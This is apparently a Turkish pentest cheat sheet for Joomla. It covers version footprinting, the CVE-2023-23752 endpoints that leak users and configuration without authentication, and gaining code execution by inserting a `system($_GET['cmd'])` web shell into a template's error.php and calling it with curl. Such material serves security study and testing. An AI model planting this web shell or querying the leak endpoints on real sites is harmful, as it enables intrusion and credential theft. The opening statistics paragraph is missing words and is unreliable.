Joomla

Joomla İstatistikleri

Joomla, Joomla kurulumlarında kullanılan Joomla, PHP ve veritabanı sürümleri ile sunucu işletim sistemlerinin dağılımı gibi bazı anonim toplar. Bu veriler, kamuya açık aracılığıyla sorgulanabilir.

Enumeration

Discovery/Footprinting

• meta'yı kontrol et

• robots.txt

• README.txt

Versiyon

• /administrator/manifests/files/joomla.xml dosyasında versiyonu görebilirsiniz.

• /language/en-GB/en-GB.xml dosyasında Joomla'nın versiyonunu alabilirsiniz.

• plugins/system/cache/cache.xml dosyasında yaklaşık bir versiyonu görebilirsiniz.

Otomatik

API Kimlik Doğrulaması Olmadan Bilgi Sızdırma:

4.0.0 ile 4.2.7 arasındaki sürümler, kimlik doğrulaması olmadan bilgi sızdırma (CVE-2023-23752) açığına sahiptir ve bu, kimlik bilgilerini ve diğer bilgileri dökebilir.

• Kullanıcılar: http://<host>/api/v1/users?public=true

• Konfigürasyon Dosyası: http://<host>/api/index.php/v1/config/application?public=true

Kaba Kuvvet

RCE

Eğer admin kimlik bilgilerini elde etmeyi başardıysanız, RCE elde etmek için içine bir PHP kodu parçası ekleyerek RCE yapabilirsiniz. Bunu şablonu özelleştirerek yapabiliriz.

1. Configuration altında sol altta Templates üzerine tıklayın ve şablonlar menüsünü açın.

2. Bir şablon adına tıklayın. Template sütun başlığı altında protostar seçelim. Bu bizi Templates: Customise sayfasına götürecek.

3. Son olarak, sayfa kaynağını açmak için bir sayfaya tıklayabilirsiniz. error.php sayfasını seçelim. Kod yürütmek için bir PHP tek satır ekleyeceğiz:

4. system($_GET['cmd']);

5. Kaydet ve Kapat

6. curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id

XSS'den RCE'ye

• Yetki Yükseltme: Joomla'da bir kullanıcı oluşturur.

• (RCE) Yerleşik Şablonları Düzenleme: Joomla'daki Yerleşik Şablonları düzenler.

• (Özel) Özel Sömürü: Üçüncü Taraf Joomla Eklentileri için Özel Sömürü.